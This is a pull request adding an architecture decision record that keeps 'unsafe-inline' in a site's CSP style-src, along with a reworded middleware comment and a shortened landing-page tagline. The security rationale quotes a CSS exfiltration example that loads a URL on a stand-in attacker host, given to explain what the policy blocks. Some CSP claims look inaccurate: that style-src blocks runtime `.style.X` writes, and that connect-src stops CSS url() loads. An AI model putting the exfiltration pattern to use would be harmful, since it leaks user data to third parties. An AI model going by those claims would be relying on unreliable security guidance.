### PR TITLE
docs+ui: AD11 (keep style-src unsafe-inline) + trim landing tagline

### DIFF
--- a/documentation/decisions/README.md
+++ b/documentation/decisions/README.md
@@ -24,6 +24,7 @@ Each ADR documents a non-obvious design choice and the trade-offs considered. De
 | AD8 | Cookie attributes are the security contract — kept inline in REQ-AUTH-002/003 | Security | 2026-05-03 |
 | AD9 | Storage-shape names (D1 columns, KV keys) are the persistence contract — kept inline in REQ-DISC/AUTH/SET | Storage | 2026-05-03 |
 | AD10 | Atomic conditional UPDATE as the once-per-run idempotency gate — no `acquireOnceLock` helper | Architecture | 2026-05-03 |
+| AD11 | Keep `style-src 'unsafe-inline'`; runtime `.style.X` writes for FLIP + view-transitions are intentional | Security | 2026-05-04 |
 
 ---
 
@@ -230,6 +231,50 @@ KV's eventual consistency made both races effectively undetectable via testing i
 - New gate sites SHOULD copy the pattern verbatim and document the meta.changes semantics inline; if a fourth or fifth site lands without the trigger refactor, this ADR is the place to revisit.
 
 **Related requirements:** [REQ-PIPE-008](../../sdd/generation.md#req-pipe-008-cross-chunk-semantic-dedup-pass)
+
+---
+
+### AD11: Keep `style-src 'unsafe-inline'`; runtime `.style.X` writes are intentional
+
+**Decision:** Retain `'unsafe-inline'` in the CSP `style-src` directive (`src/middleware/security-headers.ts`). Do not migrate FLIP animations or view-transition-name assignments away from runtime `.style.X` mutations.
+
+**Context:** Two architectural patterns in the codebase write to inline style attributes from JavaScript at runtime:
+
+1. **FLIP chip animations** (`src/lib/tag-railing-flip.ts`) — when the user toggles a hashtag, every chip in the tag strip measures its old and new positions, then writes `chip.style.transform = translate(${dx}px, ${dy}px)` on the inverse step and `chip.style.transform = 'translate(0,0)'` on the play step. The values are computed per-frame from real layout measurements; they cannot be enumerated at build time.
+
+2. **View-transition-name pre-flight** (`src/scripts/page-effects.ts`) — before an SPA navigation, the active card writes `link.style.setProperty('view-transition-name', card-${slug})` so the browser's View Transitions API can pair the source card with the destination article-detail header. The slug is per-article, not per-build.
+
+CSP3 `style-src` enforces the same allowlist on **runtime** style-attribute writes as on inline `<style>` blocks. Removing `'unsafe-inline'` blocks both patterns.
+
+**Alternatives considered:**
+
+- **`'unsafe-hashes'` directive (CSP3)** — allows hash-source to validate inline event handlers and `.style.X` writes. Requires a hash for every possible value. The FLIP transforms have continuous values (`translate(${dx}px, ${dy}px)`); enumeration is impossible. Rejected.
+
+- **CSS custom properties via `setProperty('--var', value)`** — write to `--flip-translate` against a static CSS rule `transform: var(--flip-translate)`. Browser behavior on whether `style-src` enforces against custom-property writes is **inconsistent across engines** (the values are stored as opaque token strings, not parsed CSS at write time). Could work, but relies on a gray-area interpretation; would need cross-browser verification. Rejected as fragile.
+
+- **Web Animations API rewrite** — `chip.animate([...])` runs entirely in JS, never touches the style attribute, CSP-exempt. Would require ~3-5h refactor of `tag-railing-flip.ts` plus a parallel rewrite of view-transition-name to use class toggles with a single fixed name. Working, but the security gain does not justify the regression risk on user-visible animation code that is hard to validate without a browser.
+
+- **Dynamic `<style nonce="...">` injection** — generate a per-request nonce, inject one `<style>` per FLIP frame, append/remove. Massive overhead per animation step; complicates the FLIP loop. Rejected.
+
+- **Migrate CSP entirely to Astro 6 `security.csp`** — Astro 6 emits per-page CSP via `<meta>` tag with auto-generated hashes. Combined with the middleware's response-header CSP, browsers enforce the intersection — and the runtime `.style.X` writes still wouldn't have hashes. Same fundamental blocker. Also blocked separately by the still-pinned `astro@5.18.1` (see `package.json`'s pin commit).
+
+**Rationale:** The actual security cost of `'unsafe-inline'` on `style-src`, given the rest of the policy, is small:
+
+- An XSS attacker who can inject CSS but not JS cannot run code or hijack the session — those vectors are blocked by the strict `script-src 'self'` (no inline scripts allowed).
+- The classic CSS exfiltration vector — `body { background: url(http://attacker.com/log?...) }` — requires an outbound network call, which is blocked by `connect-src 'self'` and the narrow `img-src 'self' data: gravatar`.
+- Attribute-leak attacks (`::before { content: attr(...) }` + URL load) are likewise blocked by `connect-src`.
+- `frame-ancestors 'none'` blocks UI redress / clickjacking via injected styles.
+
+Strict `script-src 'self'` is doing 95% of the XSS-prevention work. The marginal security gain from removing `'unsafe-inline'` on `style-src` does not justify replacing two well-understood, currently-shipping animation patterns with reimplementations on top of less-tested APIs. Many production sites run this exact combination (strict `script-src` + `'unsafe-inline'` style-src) deliberately.
+
+**Consequences:**
+
+- The CSP comment block in `src/middleware/security-headers.ts` documents `'unsafe-inline'` as required, and points at this ADR for the full reasoning.
+- A future contributor who proposes removing `'unsafe-inline'` from `style-src` MUST also propose a concrete alternative for the FLIP and view-transition-name mutation patterns. The "just drop it" path will reliably break production (this is the third time it has been attempted on this project — see `hotfix/csp-style-unsafe-inline` history).
+- If Astro ever ships native CSP support that handles runtime style mutations (e.g., via per-element nonces resolved at runtime), revisit this decision.
+- `tests/e2e/csp-violation.spec.ts` continues to act as the merge gate for any CSP tightening — it subscribes to `securitypolicyviolation` events on a live `/digest` navigation and fails the build if any fire.
+
+**Related requirements:** [REQ-OPS-003](../../sdd/operations.md#req-ops-003-baseline-browser-security-headers), [CON-SEC-001](../../sdd/constraints.md#con-sec-001-strict-content-security-policy)
 
 ---
 

--- a/src/middleware/security-headers.ts
+++ b/src/middleware/security-headers.ts
@@ -29,16 +29,20 @@
 /** Exact Content-Security-Policy value required by REQ-OPS-003 AC 1.
  * Pinned byte-for-byte in tests — do not reformat or reorder directives.
  *
- * `style-src 'self' 'unsafe-inline'`: Astro emits component-scoped CSS
- * (the `data-astro-cid-*` mechanism) as inline `<style>` blocks at the
- * end of the head, NOT as external `.css` files. The first deploy of
- * `style-src 'self'` (no `'unsafe-inline'`) broke every page in
- * production: scoped styles for the landing page, the digest grid, the
- * tag railing, and every component-scoped animation were blocked. The
- * `'unsafe-inline'` allowance is the only viable policy until Astro
- * supports per-block nonce attribution for compiled scoped styles
- * (tracked upstream — no current workaround). `script-src 'self'`
- * remains strict.
+ * `style-src 'self' 'unsafe-inline'`: required by two architectural
+ * patterns the codebase deliberately uses — the FLIP tag-railing
+ * animation in `src/lib/tag-railing-flip.ts` writes per-frame
+ * `chip.style.transform = translate(...)` values, and the
+ * view-transition-name pre-flight in `src/scripts/page-effects.ts`
+ * sets `link.style.setProperty('view-transition-name', card-${slug})`
+ * before SPA navigation so the browser pairs the source and
+ * destination during the morph. Both write dynamic, per-event values
+ * that no hash- or nonce-source can cover at runtime, and Astro also
+ * emits component-scoped CSS as inline `<style>` blocks. The full
+ * security/architecture reasoning, alternatives considered, and
+ * conditions under which this should be revisited are documented in
+ * AD11 (`documentation/decisions/README.md#ad11`). `script-src 'self'`
+ * remains strict — the actual XSS-prevention work happens there.
  *
  * `img-src` is narrowed to `'self' data: https://www.gravatar.com
  * https://secure.gravatar.com` — the only external image origin we

--- a/src/pages/index.astro
+++ b/src/pages/index.astro
@@ -52,12 +52,8 @@ const errorMessage =
     <section class="landing__hero">
       <h1 class="landing__title">Your daily tech digest,<br />distilled by AI.</h1>
       <p class="landing__tagline">
-        Where we're going, we don't need cookie banners. Or the floating chat
-        widget asking if you need help reading. Or six sites running the same
-        wire story. Pick your hashtags. The LLM reads, you take the credit. It
-        links to real sources and never declares itself a very stable genius.
-        News like it's 1995, when 'fake news' meant Elvis sightings and the
-        worst thing a President had to deny was inhaling. Minus the dial-up.
+        Where we're going, we don't need cookie banners. News like it's 1995,
+        when 'fake news' meant Elvis sightings. Minus the dial-up.
       </p>
 
       {errorMessage !== null && (


### PR DESCRIPTION
## Summary

Two unrelated-but-bundled changes:

1. **AD11** — formal architecture decision to keep `'unsafe-inline'` in CSP `style-src`. FLIP animations (`tag-railing-flip.ts`) and view-transition-name pre-flight (`page-effects.ts`) write dynamic per-event style values that no hash- or nonce-source can cover. Strict `script-src 'self'` is doing the XSS-prevention work; removing `'unsafe-inline'` from `style-src` would require a Web Animations API rewrite of FLIP for marginal real-world security gain. ADR enumerates all alternatives considered ('unsafe-hashes', custom properties, WAAPI, Astro 6 security.csp) and why each was rejected. The middleware comment now points at AD11 instead of restating the rationale inline.

2. **Tagline trim** — the long-form version felt like a comedy routine on the landing page. Three sentences now.

## Test plan
- [ ] CI green (no functional code changes)
- [ ] Curl https://news.graymatter.ch/ after deploy and verify the trimmed tagline renders